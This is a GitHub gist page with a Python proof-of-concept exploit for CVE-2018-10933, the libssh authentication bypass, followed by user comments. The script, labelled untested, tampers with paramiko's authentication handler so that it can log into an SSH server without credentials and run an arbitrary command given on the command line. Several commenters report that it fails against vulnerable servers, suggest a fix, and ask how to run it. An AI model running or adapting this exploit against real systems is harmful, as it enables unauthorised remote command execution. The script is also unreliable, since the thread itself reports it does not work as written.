Skip to content

Instantly share code, notes, and snippets.

@mlosapio
Last active February 3, 2024 18:50
  • Star 31 You must be signed in to star a gist
  • Fork 12 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save mlosapio/2062ebf943485a7289d226e0d00498e7 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# untested CVE-2018-10933
import sys, paramiko
import logging
username = sys.argv[1]
hostname = sys.argv[2]
command = sys.argv[3]
new_auth_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_USERAUTH_SUCCESS]
def auth_accept(*args, **kwargs):
return new_auth_accept(*args, **kwargs)
paramiko.auth_handler.AuthHandler._handler_table.update({
paramiko.common.MSG_USERAUTH_REQUEST: auth_accept,
})
port = 22
try:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.WarningPolicy)
client.connect(hostname, port=port, username=username, password="", pkey=None, key_filename="fake.key")
stdin, stdout, stderr = client.exec_command(command)
print stdout.read(),
finally:
client.close()
@th0j
Copy link

th0j commented Oct 18, 2018

As another user pointed out, you must change:

client.set_missing_host_key_policy(paramiko.WarningPolicy)

for

client.set_missing_host_key_policy(paramiko.WarningPolicy())

I've tested the script on a known vulnerable server and it does return a paramiko.ssh_exception.AuthenticationException: Authentication failed. error. Definitively a false negative here.

I would love to see a working exploit targeting a production-use server implementation. According to my experiments, the exploitation is heavily dependent on the server's logic, but I can be wrong.

I check my server and I found the libssh version 0.6.3-4.3. And I ran your code but it's always raise paramiko.ssh_exception.AuthenticationException: Authentication failed.
image

@soekarmana
Copy link

from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh

OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

anyone can confirm this?

@ocean390
Copy link

from : https://security.stackexchange.com/questions/195834/cve-2018-10933-bypass-ssh-authentication-libssh-vulnerability
apparently OpenSSH does not rely on libssh

OpenSSH (which is the standard SSH daemon on most systems) does not rely on libssh.

anyone can confirm this?

Yes, libssh is an implementation of ssh protocol server library, and OpenSSH is an another implementation

@qran253
Copy link

qran253 commented Oct 19, 2018

what is wrong here ? installed python-paramiko

root@test-VM:/home/test# python3 asd.py
Traceback (most recent call last):
File "asd.py", line 4, in
import paramiko
ModuleNotFoundError: No module named 'paramiko'

@rodrigobash
Copy link

What am I doing wrong?

image

@salik89
Copy link

salik89 commented Oct 2, 2020

Hi there, I chanced upon this and wondering if you could advise if there is a need for me to have an actual server before I can test this code? Or could I test it locally, eg. In Kali via VirtualBox?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment